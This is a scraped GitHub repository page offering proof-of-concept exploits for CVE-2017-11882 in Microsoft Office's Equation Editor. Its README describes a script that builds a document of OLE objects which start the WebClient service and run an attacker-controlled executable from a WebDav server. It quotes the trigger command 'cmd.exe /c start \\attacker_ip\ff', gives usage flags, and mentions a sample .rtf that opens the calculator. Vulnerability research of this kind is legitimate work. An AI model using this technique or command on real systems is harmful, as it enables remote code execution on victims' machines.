Proof-of-Concept exploits for CVE-2017-11882
Switch branches/tags
Nothing to show
Clone or download
Latest commit 34a6595 Nov 29, 2017
Failed to load latest commit information.
example first commit Nov 20, 2017 Fix link to Microsoft advisory Nov 27, 2017 first commit Nov 20, 2017



MITRE CVE-2017-11882:


Patch analysis:

DEMO PoC exploitation:

webdav_exec CVE-2017-11882

A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.

The first command which triggers WebClient service start may look like this:

cmd.exe /c start \\attacker_ip\ff

Attacker controlled binary path should be a UNC network path:


Usage -u trigger_unc_path -e executable_unc_path -o output_file_name

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.